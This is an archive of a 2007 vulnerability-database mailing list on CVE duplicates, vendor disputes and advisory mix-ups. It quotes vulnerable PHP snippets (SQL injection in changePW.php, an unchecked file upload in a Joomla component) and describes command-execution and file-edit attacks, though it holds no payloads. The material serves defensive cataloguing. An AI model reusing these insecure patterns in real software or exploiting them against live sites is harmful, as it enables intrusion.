From coley at linus.mitre.org Mon Jul 2 21:37:08 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Mon, 2 Jul 2007 17:37:08 -0400 (EDT) Subject: [VIM] Questions about CVE-2007-3161 In-Reply-To: <46846712.3020209@tenablesecurity.com> References: <46846712.3020209@tenablesecurity.com> Message-ID: I don't have any more information. The dates seem to align pretty well, though. Certainly sounds like either bullet could apply... or not. Ah, the joys of changelogs! - Steve On Thu, 28 Jun 2007, George A. Theall wrote: > Any bets the fix was classified as either: > > o "Random crashes while browsing." > o "Numerous minor bugfixes and stability improvements." From theall at tenablesecurity.com Tue Jul 3 11:17:21 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Tue, 03 Jul 2007 07:17:21 -0400 Subject: [VIM] Sun JDK Confusion Message-ID: <468A3041.5000008@tenablesecurity.com> Last May, there was an advisory published by Chris Evans about image parsing library vulnerabilities in Sun's JDK: http://scary.beasts.org/security/CESA-2006-004.html This seems to have resulted in Bugtraq 24267 / CVE-2007-3004 duplicating Bugtraq 24004 / CVE-2007-2788 and CVE-2007-2789. Steve, any ideas? George -- theall at tenablesecurity.com From rkeith at securityfocus.com Wed Jul 4 16:46:46 2007 From: rkeith at securityfocus.com (rkeith at securityfocus.com) Date: Wed, 4 Jul 2007 10:46:46 -0600 (MDT) Subject: [VIM] [theall@tenablesecurity.com: Sun JDK Confusion] (fwd) Message-ID: US-CERT seems to think Sun: 102934 relates to the CESA-2006-004 article. The Sun advisory however only credits Chris Evans, but includes no definitive link to the article. I am inclined to agree that it is a duplicate. http://www.kb.cert.org/vuls/id/138545 References: http://www.sunsolve.sun.com/search/document.do?assetkey=1-26-102934-1 http://java.sun.com/j2se/1.5.0/docs/guide/deployment/deployment-guide/jcp.html#update # http://scary.beasts.org/security/CESA-2006-004.html http://java.sun.com/j2se/1.4.2/download.html http://java.com/en/download/help/testvm.xml http://www.cert.org/tech_tips/securing_browser/ http://www.color.org/ -- Rob Keith Symantec ----- Forwarded message from "George A. Theall" ----- From: "George A. Theall" Subject: [VIM] Sun JDK Confusion To: Vulnerability Information Managers Reply-To: Vulnerability Information Managers Date: Tue, 03 Jul 2007 07:17:21 -0400 User-Agent: Thunderbird 2.0.0.4 (X11/20070604) Message-ID: <468A3041.5000008 at tenablesecurity.com> Last May, there was an advisory published by Chris Evans about image parsing library vulnerabilities in Sun's JDK: http://scary.beasts.org/security/CESA-2006-004.html This seems to have resulted in Bugtraq 24267 / CVE-2007-3004 duplicating Bugtraq 24004 / CVE-2007-2788 and CVE-2007-2789. Steve, any ideas? George -- theall at tenablesecurity.com ----- End forwarded message ----- -- Dave McKinney Symantec keyID: E461AE4E key fingerprint = F1FC 9073 09FA F0C7 500D D7EB E985 FAF3 E461 AE4E From coley at linus.mitre.org Thu Jul 5 17:37:59 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Thu, 5 Jul 2007 13:37:59 -0400 (EDT) Subject: [VIM] Sun JDK Confusion In-Reply-To: <468A3041.5000008@tenablesecurity.com> References: <468A3041.5000008@tenablesecurity.com> Message-ID: I'm inclined to think that these are duplicates too, but I'll email Sun just to be sure. On Tue, 3 Jul 2007, George A. Theall wrote: > Last May, there was an advisory published by Chris Evans about image > parsing library vulnerabilities in Sun's JDK: > > http://scary.beasts.org/security/CESA-2006-004.html > > This seems to have resulted in Bugtraq 24267 / CVE-2007-3004 duplicating > Bugtraq 24004 / CVE-2007-2788 and CVE-2007-2789. Steve, any ideas? > > > George > -- > theall at tenablesecurity.com > From coley at mitre.org Mon Jul 9 14:44:35 2007 From: coley at mitre.org (Steven M. Christey) Date: Mon, 9 Jul 2007 10:44:35 -0400 (EDT) Subject: [VIM] old r0t links wiped out Message-ID: <200707091444.l69EiZUb008510@faron.mitre.org> Looks like r0t found the password to the old pridels.blogspot.com site, or maybe someone hacked into it. Either way, all the articles seem to be completely 404. Is anybody communicating with him these days? Anonymous comments are disabled on his page. I've been thinking for a while that we could really use an archive.org-style Wayback Machine that records all these miscellaneous URLs and vendor news items, and only rolls them out when the old pages get deleted or killed. Ah, the things we would do if time and resources were plentiful... - Steve From sullo at cirt.net Mon Jul 9 14:52:38 2007 From: sullo at cirt.net (Sullo) Date: Mon, 9 Jul 2007 10:52:38 -0400 Subject: [VIM] old r0t links wiped out In-Reply-To: <200707091444.l69EiZUb008510@faron.mitre.org> References: <200707091444.l69EiZUb008510@faron.mitre.org> Message-ID: <20070709105238.0pxszzwqgwcokco0@webmail.sullo.com> Quoting "Steven M. Christey" : > I've been thinking for a while that we could really use an > archive.org-style Wayback Machine that records all these miscellaneous > URLs and vendor news items, and only rolls them out when the old pages > get deleted or killed. Ah, the things we would do if time and > resources were plentiful... Yeah... we've talked about this as well... just need the time to make something good (and safe)! Alternately, we could actually use (abuse?) the wayback machine to catalog. 6 month lag, though... and would take some work for each one: http://www.archive.org/about/faqs.php#1 Also, you may want to check to see if you have any links to frog-man.org as well--Nikto DB had several for advisories, and that site is gone (ad site now). A week or so ago I managed to find a few on archive.org and put them OSVDB.org if you need the links (I can dig them up). -- http://cirt.net | http://osvdb.org/ From ge at linuxbox.org Mon Jul 9 14:55:01 2007 From: ge at linuxbox.org (Gadi Evron) Date: Mon, 9 Jul 2007 09:55:01 -0500 (CDT) Subject: [VIM] old r0t links wiped out In-Reply-To: <20070709105238.0pxszzwqgwcokco0@webmail.sullo.com> References: <200707091444.l69EiZUb008510@faron.mitre.org> <20070709105238.0pxszzwqgwcokco0@webmail.sullo.com> Message-ID: On Mon, 9 Jul 2007, Sullo wrote: > Quoting "Steven M. Christey" : > >> I've been thinking for a while that we could really use an >> archive.org-style Wayback Machine that records all these miscellaneous >> URLs and vendor news items, and only rolls them out when the old pages >> get deleted or killed. Ah, the things we would do if time and >> resources were plentiful... > > Yeah... we've talked about this as well... just need the time to make > something good (and safe)! > > Alternately, we could actually use (abuse?) the wayback machine to catalog. 6 > month lag, though... and would take some work for each one: > http://www.archive.org/about/faqs.php#1 > > Also, you may want to check to see if you have any links to frog-man.org as > well--Nikto DB had several for advisories, and that site is gone (ad site > now). A week or so ago I managed to find a few on archive.org and put them > OSVDB.org if you need the links (I can dig them up). I wonder if they are still cached by Google. > > > > > -- > http://cirt.net | http://osvdb.org/ > From jericho at attrition.org Mon Jul 9 20:31:51 2007 From: jericho at attrition.org (security curmudgeon) Date: Mon, 9 Jul 2007 20:31:51 +0000 (UTC) Subject: [VIM] old r0t links wiped out In-Reply-To: <200707091444.l69EiZUb008510@faron.mitre.org> References: <200707091444.l69EiZUb008510@faron.mitre.org> Message-ID: : I've been thinking for a while that we could really use an : archive.org-style Wayback Machine that records all these miscellaneous : URLs and vendor news items, and only rolls them out when the old pages : get deleted or killed. Ah, the things we would do if time and resources : were plentiful... Due to the style of blogs and variety, I don't mirror blog content usually. I do grab a copy of .txt or .pdf advisories many times since wget likes those w/o hassle =) From theall at tenablesecurity.com Tue Jul 10 01:46:25 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 09 Jul 2007 21:46:25 -0400 Subject: [VIM] SquirrelMail GPG Plugin Vulnerabilities Message-ID: <4692E4F1.7000207@tenablesecurity.com> I'm trying to make sense of the spate of recent vulnerabilities associated with the GPG Plugin for SquirrelMail. o There's the WabiSabiLabi advisory (ZD-00000004) that sparked the interest. It supposedly affects version 2.0 of the plugin, is remotely exploitable, and allows for command execution. o The author released version 2.1 of the plugin on 7/7 and says it "contains security fixes to prevent possible command injection attacks by local authenticated users against the webserver user." I don't find any reference in the release or on the author's site to the WabiSabiLabi advisory per se, and the CVS commit log for the software, at , shows only a single change in 2007, made on 7/7, for a local file include issue in the 'gpg_pop_init.php' script as noted by Stefan Esser. [A quick check shows that it involves the 'MOD' parameter and can be exploited remotely without authentication.] o http://lists.immunitysec.com/pipermail/dailydave/2007-July/004448.html is a post made by Charlie Miller on 7/6 to Daily Dave in which he suggests the issue underlying ZD-00000004 might involve $passphrase in gpg_sign_attachment() although he has not actually verified it. o http://lists.immunitysec.com/pipermail/dailydave/2007-July/004452.html is a post made Nicob on 7/8 to Daily Dave that mentions an attack vector fixed in version 2.1 but provides no specifics. o http://lists.immunitysec.com/pipermail/dailydave/2007-July/004453.html is a post from Stefan Esser on 7/9 to Daily Dave that asserts there are several more shell command execution flaws in version 2.1 that the vendor is aware of. Unfortunately, he provides no specifics. o http://lists.immunitysec.com/pipermail/dailydave/2007-July/004456.html is a post made by Nicob on 7/9 to Daily Dave that details an attack vector involving the gpg_check_sign_pgp_mime() function in gpg_hook_functions.php. So, how are you VDB folks sorting all this out? I've noticed so far that Bugtraq 24782 maps to WabiSabiLabi's advisory (although oddly it claims the issue has now been resolved with version 2.1 of the plugin) and 24828 to Esser's posting. Am I getting all this straight? George -- theall at tenablesecurity.com From nicob at nicob.net Tue Jul 10 11:40:31 2007 From: nicob at nicob.net (Nicob) Date: Tue, 10 Jul 2007 13:40:31 +0200 Subject: [VIM] SquirrelMail GPG Plugin Vulnerabilities In-Reply-To: <4692E4F1.7000207@tenablesecurity.com> References: <4692E4F1.7000207@tenablesecurity.com> Message-ID: <1184067631.5902.43.camel@localhost> > o http://lists.immunitysec.com/pipermail/dailydave/2007-July/004452.html > is a post made Nicob on 7/8 to Daily Dave that mentions an attack vector > fixed in version 2.1 but provides no specifics. > o http://lists.immunitysec.com/pipermail/dailydave/2007-July/004456.html > is a post made by Nicob on 7/9 to Daily Dave that details an attack > vector involving the gpg_check_sign_pgp_mime() function in > gpg_hook_functions.php. That's the same vuln. My PoC for the gpg_check_sign_pgp_mime() command execution doesn't affect version 2.1 because of a switch from exec() to proc_open(). But I wouldn't bet there's no more room for exploitation of this very vuln if somebody spend enough time to understand their complex use of proc_open(). Nicob From heinbockel at mitre.org Tue Jul 10 16:50:24 2007 From: heinbockel at mitre.org (Heinbockel, Bill) Date: Tue, 10 Jul 2007 12:50:24 -0400 Subject: [VIM] AVTutorial 1.0 changePW.php vulnerabilities Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC0201F4DC@IMCSRV5.MITRE.ORG> There are (at least) two different issues recently reported in changePW.php in AVTutorial 1.0: (1) Password change for arbitrary users [CVE-2007-3630] http://www.milw0rm.com/exploits/4163 (2) SQL injection - in the id and userid parameters http://secunia.com/advisories/25969 Now, the code from changePW.php: > $id = $_GET['userid']; > $oldpassword = $_GET['id']; > $password = $_POST['password']; > $password = stripslashes($password); > $password = md5($password); > $sql = mysql_query("UPDATE ls_users SET password='$password' WHERE id='$id' AND password='$oldpassword'") > or die (mysql_error()); > echo "Password has been changed"; William Heinbockel Infosec Engineer, Sr. The MITRE Corporation 202 Burlington Rd. MS S145 Bedford, MA 01730 heinbockel at mitre.org 781-271-2615 From coley at linus.mitre.org Tue Jul 10 18:03:46 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Tue, 10 Jul 2007 14:03:46 -0400 (EDT) Subject: [VIM] Vendor dispute - Google Custom Search Engine XSS (CVE-2007-3484) Message-ID: Dispute from the Google security team. Apparently the original researcher found an issue in a modified site. Not sure if other VDBs picked it up. - Steve Date: Fri, 6 Jul 2007 15:28:34 -0700 To: cve at mitre.org, coley at rcf-smtp.mitre.org Subject: Followup to CVE-2007-3484 The Google security team discovered the CVE candidate CVE-2007-3484 and would like to submit the following vendor response. "This is not a bug in the Google Custom Search Engine (http://google.com/coop/cse/) product, as Google does not provide the "search.php" script referenced. When a user creates a custom search engine, we provide them with a block of javascript to include on their site. Some users write additional code around this block of javascript to further customize their website. The three examples provided at websecurity.com.ua/1050/ are three independent XSS vulnerabilities in their own respective sites and are not related to Google. Google is an ardent believer in responsible disclosure, as it helps protect users from exploitation of security flaws. If you find an issue with a Google product, please notify us at security at google.com. We appreciate the efforts of security researchers who have responsibly disclosed issues in our software; we are happy to thank contributors on www.google.com/corporate/security.html. " security at google.com From coley at linus.mitre.org Tue Jul 10 18:07:07 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Tue, 10 Jul 2007 14:07:07 -0400 (EDT) Subject: [VIM] Vendor ACK: CVE-2007-2017 (AlstraSoft useredit.php auth bypass) Message-ID: ---------- Forwarded message ---------- Date: Sat, 7 Jul 2007 14:51:07 +0800 From: AlstraSoft Subject: Vulnerability Report (submitted through the National Vulnerability Database) Regarding: http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2017 This security loophole has been fix in our current version which we have added the admin login check for useredit.php and checking of the "id" in msg.php - www.alstrasoft.com/videoshare_fix.zip AlstraSoft Support Team http://www.alstrasoft.com From coley at linus.mitre.org Wed Jul 11 00:06:27 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Tue, 10 Jul 2007 20:06:27 -0400 (EDT) Subject: [VIM] Sun JDK Confusion In-Reply-To: References: <468A3041.5000008@tenablesecurity.com> Message-ID: Sun confirmed that CVE-2007-3004 is a duplicate of CVE-2007-2788/CVE-2007-2789. We'll be rejecting CVE-2007-3004 accordingly. - Steve From jericho at attrition.org Wed Jul 11 00:43:29 2007 From: jericho at attrition.org (security curmudgeon) Date: Wed, 11 Jul 2007 00:43:29 +0000 (UTC) Subject: [VIM] vendors bring it on themselves sometimes.. In-Reply-To: <20070711002014.GQ4885@verysecurelinux.com> References: <20070711002014.GQ4885@verysecurelinux.com> Message-ID: : Wachovia Bank website sends confidential information (social security : numbers, phone number, address, etc.) over the Internet without : encryption. : : Horizon Network Security Security Advisory 07/10/2007 : The vendor (Wachovia Bank) was notified via their customer service phone : number on June 25. We were transferred to "web support". The person : answering asked us to FAX the details to her and we did so, also on June : 25. We explained that we were reporting a severe security problem on : their web site. : VIII. DISCLOSURE TIMELINE : : 06/25/2007 Initial vendor notification : 06/25/2007 Vendor requested FAXed details : 06/25/2007 Details FAXed to vendor : : 07/20/2007 No vendor response : 07/20/2007 Public disclosure on this Full Disclosure list In this day and age, asking for the information to be faxed is silly. From theall at tenablesecurity.com Wed Jul 11 17:15:52 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Wed, 11 Jul 2007 13:15:52 -0400 Subject: [VIM] True: SquirrelMail G/PGP Encryption Plug-in 2.0 Command Execution Vuln Message-ID: <46951048.4080003@tenablesecurity.com> FWIW, Milw0rm 4173 works for me under Squirrelmail 1.4.10a and GPG plugin 2.0. With some slight modifications of the PoC, you don't need authentication and can return results of any commands. The modified PoC also works against version 2.1 of the plugin. I don't seem to be able to return results of the commands directly, but it is possible to redirect to a file and then read that later. George -- theall at tenablesecurity.com From theall at tenablesecurity.com Fri Jul 13 02:20:18 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Thu, 12 Jul 2007 22:20:18 -0400 Subject: [VIM] MkPortal <= 1.1.1 reviews / gallery modules SQL Injection Exploit Message-ID: <4696E162.6020602@tenablesecurity.com> Milw0rm 4179 / BID 24891 seems like it's a subset of the issues covered by BID 24886 / . That is, the 'ind' parameter controls the module, 'op' controls the function, and 'iden' is the specific input passed to the SQL queries. Anyone else notice this? George -- theall at tenablesecurity.com From smoore at securityglobal.net Sat Jul 14 03:26:15 2007 From: smoore at securityglobal.net (Stuart Moore) Date: Fri, 13 Jul 2007 23:26:15 -0400 Subject: [VIM] Sun JDK Confusion In-Reply-To: References: <468A3041.5000008@tenablesecurity.com> Message-ID: <46984257.9090104@securityglobal.net> How about CVE-2007-3005? Similar situation, I think. Stuart Steven M. Christey wrote: > Sun confirmed that CVE-2007-3004 is a duplicate of > CVE-2007-2788/CVE-2007-2789. We'll be rejecting CVE-2007-3004 > accordingly. > > - Steve > From str0ke at milw0rm.com Sat Jul 14 23:13:47 2007 From: str0ke at milw0rm.com (str0ke) Date: Sat, 14 Jul 2007 18:13:47 -0500 Subject: [VIM] Fwd: Menu Manager Mod for WebAPP - No Input Filtering In-Reply-To: <20070714045620.8810.qmail@securityfocus.com> References: <20070714045620.8810.qmail@securityfocus.com> Message-ID: <814b9d50707141613k5895beb0l2af0b6b13f0f5537@mail.gmail.com> The plot thickens? ---------- Forwarded message ---------- From: info at web-app.net Date: 14 Jul 2007 04:56:20 -0000 Subject: Re: Menu Manager Mod for WebAPP - No Input Filtering To: bugtraq at securityfocus.com The issue is not yet secure at http://www.web-app.org 1.) Guests can edit files on the server by: http://victim-domain/cgi-bin/index.cgi?action=menu - There are approximately 35 webapporg sites of version 0.9.9.7 defaced with the issue. So it couldn't possibly be fixed for 0.9.9.7 as claimed above. 2.) Members/guests can add $values in the menu form. Allowing $ is madness, its it can be exploited to run direct cmd on the Perl shell. I tried posting a message about it before here but it was unnoticed and never published. Kind regards On Elpeleg WebAPP From webapp at web-app.org Sun Jul 15 21:15:39 2007 From: webapp at web-app.org (Web-APP) Date: Sun, 15 Jul 2007 14:15:39 -0700 Subject: [VIM] Fwd: Menu Manager Mod for WebAPP - No Input Filtering References: <20070714045620.8810.qmail@securityfocus.com> <814b9d50707141613k5895beb0l2af0b6b13f0f5537@mail.gmail.com> Message-ID: <000601c7c725$4c536680$0400a8c0@hsd1.wa.comcast.net> Wow. ----- Original Message ----- From: "str0ke" To: "Vulnerability Information Managers" Sent: Saturday, July 14, 2007 4:13 PM Subject: [VIM] Fwd: Menu Manager Mod for WebAPP - No Input Filtering > The plot thickens? > > ---------- Forwarded message ---------- > From: info at web-app.net > Date: 14 Jul 2007 04:56:20 -0000 > Subject: Re: Menu Manager Mod for WebAPP - No Input Filtering > To: bugtraq at securityfocus.com > > > The issue is not yet secure at http://www.web-app.org > > 1.) Guests can edit files on the server by: > http://victim-domain/cgi-bin/index.cgi?action=menu > - There are approximately 35 webapporg sites of version 0.9.9.7 > defaced with the issue. So it couldn't possibly be fixed for 0.9.9.7 > as claimed above. > > 2.) Members/guests can add $values in the menu form. Allowing $ is > madness, its it can be exploited to run direct cmd on the Perl shell. > > I tried posting a message about it before here but it was unnoticed > and never published. > > Kind regards > On Elpeleg > WebAPP > From webapp at web-app.org Sun Jul 15 21:33:58 2007 From: webapp at web-app.org (Web-APP) Date: Sun, 15 Jul 2007 14:33:58 -0700 Subject: [VIM] Fwd: Menu Manager Mod for WebAPP - No Input Filtering References: <20070714045620.8810.qmail@securityfocus.com> <814b9d50707141613k5895beb0l2af0b6b13f0f5537@mail.gmail.com> Message-ID: <000e01c7c727$db8c3780$0400a8c0@hsd1.wa.comcast.net> Incidentally, I came across the original thread where On was concerned with this issue, at http://www.web-app.org/cgi-bin/index.cgi?action=forum&board=security101&op=display&num=8837 . At the time I was exhausted script-wise and deprived life-wise from producing 0.9.9.3 which was WebAPP's biggest set of changes and additions ever done in one version. Since the security team had considered the issue and dismissed it as not a security problem, I too overlooked it, apparently, following that thread. The menu manager was originally "Jack Deth's" addition. Maybe he knows a little more about this suspected security loophole. On was against adding it, but his protests came along after the release had already been made. And then they were dismissed by "Mossad" and then On. Is there still a valid issue here? If so, anybody care to share it with us so we can make any necessary patches? http://www.web-app.org WebAPP The "who can make a better WebAPP Web Automated Perl Portal" project. ----- Original Message ----- From: "str0ke" To: "Vulnerability Information Managers" Sent: Saturday, July 14, 2007 4:13 PM Subject: [VIM] Fwd: Menu Manager Mod for WebAPP - No Input Filtering > The plot thickens? > > ---------- Forwarded message ---------- > From: info at web-app.net > Date: 14 Jul 2007 04:56:20 -0000 > Subject: Re: Menu Manager Mod for WebAPP - No Input Filtering > To: bugtraq at securityfocus.com > > > The issue is not yet secure at http://www.web-app.org > > 1.) Guests can edit files on the server by: > http://victim-domain/cgi-bin/index.cgi?action=menu > - There are approximately 35 webapporg sites of version 0.9.9.7 > defaced with the issue. So it couldn't possibly be fixed for 0.9.9.7 > as claimed above. > > 2.) Members/guests can add $values in the menu form. Allowing $ is > madness, its it can be exploited to run direct cmd on the Perl shell. > > I tried posting a message about it before here but it was unnoticed > and never published. > > Kind regards > On Elpeleg > WebAPP > From coley at linus.mitre.org Wed Jul 18 15:49:59 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed, 18 Jul 2007 11:49:59 -0400 (EDT) Subject: [VIM] Vendor ACK for CVE-2007-3677 (eVisit Analyst) Message-ID: ---------- Forwarded message ---------- Date: Wed, 18 Jul 2007 16:43:15 +0100 From: John Harrison To: cve at mitre.org Subject: CVE-2007-3677 Hi The following entry on your website CVE-2007-3677 The information presented on your website regarding this issue is not a complete copy of the original Portcullis Security Advisory 06-057. In particular it omits vital information including the following: "The vendor has been notified and the vulnerability fixed." Because of this omission your website implies that there is a current problem with eVisit Analyst. This is not correct. We would be grateful if you could correct this as a matter of urgency. Regards John John Harrison Maxsi Ltd From theall at tenablesecurity.com Wed Jul 18 20:56:20 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Wed, 18 Jul 2007 16:56:20 -0400 Subject: [VIM] Confirm: Joomla Component Expose <= RC35 Remote File Upload Vulnerability Message-ID: <469E7E74.7090306@tenablesecurity.com> Milw0rm 4194 is valid. Looking at the code, we have this: --- snip, snip, snip --- if (isset($_FILES['userfile'])) { $target_path = "../../../components/com_expose/expose/img/"; $target_path = $target_path. basename( $_FILES['userfile']['name']); $userfile_name = (isset($_FILES['userfile']['name']) ? $_FILES['userfile']['name'] : ""); $filename = split("\.", $userfile_name); if ((strcasecmp(substr($userfile_name,-4),'.jpg'))) { echo ""; } if(!move_uploaded_file($_FILES['userfile']['tmp_name'], $target_path)) { --- snip, snip, snip --- As you can plainly see, the code doesn't exit if the upload's filename doesn't end with '.jpg' but happily continues to move the file over to the destination in a directory under the document root. George -- theall at tenablesecurity.com From coley at mitre.org Thu Jul 19 20:34:19 2007 From: coley at mitre.org (Steven M. Christey) Date: Thu, 19 Jul 2007 16:34:19 -0400 (EDT) Subject: [VIM] There is no AS02 in Oracle CPU Jul 2007 Message-ID: <200707192034.l6JKYJDO026718@faron.mitre.org> This month's CPU lists AS02 under "Oracle Collaboration Suite" and has it in italics, which usually suggests that the issue appears in multiple products. However, there is no AS02 under the Application Server section - there's only an AS01. Oracle just confirmed to me that the "AS02" was a typo, and should have been just AS01. - Steve From mschoene at redhat.com Fri Jul 20 13:33:36 2007 From: mschoene at redhat.com (Marc Schoenefeld) Date: Fri, 20 Jul 2007 15:33:36 +0200 Subject: [VIM] Sun JDK Confusion In-Reply-To: References: <468A3041.5000008@tenablesecurity.com> Message-ID: <46A0B9B0.5010206@redhat.com> Hi Steve, how about CVE-2007-3005? Is this also a duplicate? Regards Marc Steven M. Christey wrote: > Sun confirmed that CVE-2007-3004 is a duplicate of > CVE-2007-2788/CVE-2007-2789. We'll be rejecting CVE-2007-3004 > accordingly. > > - Steve > -- Marc Schoenefeld / Red Hat Security Response Team From jericho at attrition.org Sun Jul 22 11:01:43 2007 From: jericho at attrition.org (security curmudgeon) Date: Sun, 22 Jul 2007 11:01:43 +0000 (UTC) Subject: [VIM] Symantec advisory CVE question/confusion Message-ID: In reference to the following advisory, the revision history doesn't include dates, and it doesn't indicate which information was wrong now: http://securityresponse.symantec.com/avcenter/security/Content/2007.07.11f.html Revision History Removed invalid CVE information -- The advisory above is for "two vulnerabilities" in the Decomposer component. The following two CVE entries seem to match: CVE-2007-3801 CONFIRM:http://securityresponse.symantec.com/avcenter/security/Content/2007.07.11f.html RAR archive file header infinite loop DoS CVE-2007-3802 CONFIRM:http://securityresponse.symantec.com/avcenter/security/Content/2007.07.11f.html CAB archive arbitrary code execution The following two ZDI advisories also seem to match, but list two different CVE numbers, both in reserved status. I have a hunch that these numbers were the ones removed from the Symantec advisory and are now essentially duplicates (or will be rejected in favor of the ones above): http://www.zerodayinitiative.com/advisories/ZDI-07-040.html CVE-2007-0447 http://www.symantec.com/avcenter/security/Content/2007.07.11f.html CAB parsing heap overflow http://www.zerodayinitiative.com/advisories/ZDI-07-039.html CVE-2007-3699 http://www.symantec.com/avcenter/security/Content/2007.07.11f.html RAR archive DoS Can Symantec or CVE confirm this? Brian OSVDB.org From jericho at attrition.org Tue Jul 24 12:40:35 2007 From: jericho at attrition.org (security curmudgeon) Date: Tue, 24 Jul 2007 12:40:35 +0000 (UTC) Subject: [VIM] question for str0ke Message-ID: CVE-2007-1710 references: http://www.milw0rm.com/exploits/3573 This shows up as a blank page. Any notes on why it was removed? Any chance you can start putting brief explanations on why they are removed? From str0ke at milw0rm.com Tue Jul 24 12:58:37 2007 From: str0ke at milw0rm.com (str0ke) Date: Tue, 24 Jul 2007 07:58:37 -0500 Subject: [VIM] question for str0ke In-Reply-To: References: Message-ID: <814b9d50707240558u37b78b56s14c14fe4b22b5286@mail.gmail.com> Sorry about that, The file was removed do to it being stolen work from someone else, with a name change here and there. Anything from last week on will now have a short description. /str0ke On 7/24/07, security curmudgeon wrote: > > CVE-2007-1710 > > references: http://www.milw0rm.com/exploits/3573 > > This shows up as a blank page. Any notes on why it was removed? Any chance > you can start putting brief explanations on why they are removed? > From jericho at attrition.org Tue Jul 24 13:13:20 2007 From: jericho at attrition.org (security curmudgeon) Date: Tue, 24 Jul 2007 13:13:20 +0000 (UTC) Subject: [VIM] question for str0ke In-Reply-To: <814b9d50707240558u37b78b56s14c14fe4b22b5286@mail.gmail.com> References: <814b9d50707240558u37b78b56s14c14fe4b22b5286@mail.gmail.com> Message-ID: : The file was removed do to it being stolen work from someone else, with : a name change here and there. Anything from last week on will now have : a short description. Do you have a reference for the other work it was stolen from? From str0ke at milw0rm.com Tue Jul 24 13:47:55 2007 From: str0ke at milw0rm.com (str0ke) Date: Tue, 24 Jul 2007 08:47:55 -0500 Subject: [VIM] question for str0ke In-Reply-To: References: <814b9d50707240558u37b78b56s14c14fe4b22b5286@mail.gmail.com> Message-ID: <814b9d50707240647ga175477m993dcd2568f44db3@mail.gmail.com> When I get a little time today I'll throw you what I had up at the time. /str0ke On 7/24/07, security curmudgeon wrote: > > : The file was removed do to it being stolen work from someone else, with > : a name change here and there. Anything from last week on will now have > : a short description. > > Do you have a reference for the other work it was stolen from? > From jericho at attrition.org Tue Jul 24 14:56:45 2007 From: jericho at attrition.org (security curmudgeon) Date: Tue, 24 Jul 2007 14:56:45 +0000 (UTC) Subject: [VIM] zoo - amavis - barracuda cross-ref problems Message-ID: http://www.amavis.org/security/asa-2007-2.txt o zoo-2.10 - CVE-2007-1669: A patch for version 2.10 is provided in section VII of the original zoo advisory. http://cve.mitre.org/cgi-bin/cvename.cgi?name=2007-1669 Barracuda Spam Firewall 3.4 and later with virusdef before 2.0.6399, and Spam Firewall before 3.4 20070319 with virusdef before 2.0.6399o, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. http://secunia.com/advisories/25315/ Amavis Zoo Denial of Service Vulnerability CVE reference: CVE-2007-1669 So the Amavis and Secunia advisory both ref the same CVE specifying 'Zoo', but CVE is more specific saying Barracuda and not wording it to mention Zoo as the underlying problem. From coley at linus.mitre.org Wed Jul 25 21:46:11 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed, 25 Jul 2007 17:46:11 -0400 (EDT) Subject: [VIM] zoo - amavis - barracuda cross-ref problems In-Reply-To: References: Message-ID: CVE didn't pick up SA25315, and we didn't independently notice the AMaViS advisory, which is why it wasn't mentioned. The phrasing for 2007-1669 definitely could have been better, instead of emphasizing Barracuda so much. I've changed both CVEs to mention AMaViS specifically. Note that the AMaViS advisory implies that the problem only occurs when AMaViS is installed on a system that already independently has the vulnerable ZOO software. So, this isn't necessarily a case of borrowed code appearing in AMaViS, rather a defense-in-depth measure like when Mozilla recently defended itself against the IE argument injection issue. - Steve From jericho at attrition.org Fri Jul 27 12:08:52 2007 From: jericho at attrition.org (security curmudgeon) Date: Fri, 27 Jul 2007 12:08:52 +0000 (UTC) Subject: [VIM] RedLevel RedAlert silliness Message-ID: http://redlevel.org/redalert.php The red bar on the left indicates the amount of current vulnerablites discovered throughout the world. This bar updates every 15 seconds. If a new threat is discovered, it is posted and displayed here. -- The current "Active" number is 76. How do they get this? From the footer: This demo of RedAlert fetches RSS from SecurityFocus.com; specifically, the BugTraq mailing list. This RSS feed is then parsed, a number is recorded, posted to a local MySQL database, and retrieved with a few lines of ActionScript and PHP. (and if you're wondering, the redlevel.org reference for CVE-2007-2806 doesn't work now, which is what lead me to this) From coley at mitre.org Mon Jul 30 16:00:56 2007 From: coley at mitre.org (Steven M. Christey) Date: Mon, 30 Jul 2007 12:00:56 -0400 (EDT) Subject: [VIM] Adult Directory - site-specific? Message-ID: <200707301600.l6UG0ubM017048@faron.mitre.org> Refs: http://www.milw0rm.com/exploits/4238 FrSIRT/ADV-2007-2695 One of our analysts observed: There is a substantial inconsistency in how the researcher specifies the product; it is not known whether the actual product is site-specific. In particular, the researcher says photo.sourceforge.net, which points to a SourceForge project named Photo Collection. There is only one version of Photo Collection available at SourceForge (1.3.1, from 20000803). This version does not have a directory.php or any use of cat_id. Also, the download has no mention of "Adult." The researcher provides a DORK field apparently intended for locating installations of the product, but nothing relevant was found as of 20070730. It is conceivable that the product in question is a distributable variant of the SourceForge Photo Collection product, with additional components such as directory.php. Anybody have more info? - Steve From coley at mitre.org Mon Jul 30 16:31:07 2007 From: coley at mitre.org (Steven M. Christey) Date: Mon, 30 Jul 2007 12:31:07 -0400 (EDT) Subject: [VIM] Remote File Inclusion: it's not just for PHP anymore Message-ID: <200707301631.l6UGV7nu017710@faron.mitre.org> I thought this was interesting: MILW0RM:4226 http://www.milw0rm.com/exploits/4226 It's an ActiveX control with an absolute path traversal vulnerability, probably stemming from unrestricted/unauthenticated access to a powerful method (these kinds of problems are giving me minor fits in terms of how to classify them). The "GetToFile" method apparently accepts a URL and a target filename as arguments. Come to think of it, I bet you see this in a lot of ActiveX controls that either (1) perform installation or updates for a product, or (2) do a lot of heavy file transfers back and forth. - Steve From str0ke at milw0rm.com Mon Jul 30 17:52:47 2007 From: str0ke at milw0rm.com (str0ke) Date: Mon, 30 Jul 2007 12:52:47 -0500 Subject: [VIM] Adult Directory - site-specific? In-Reply-To: 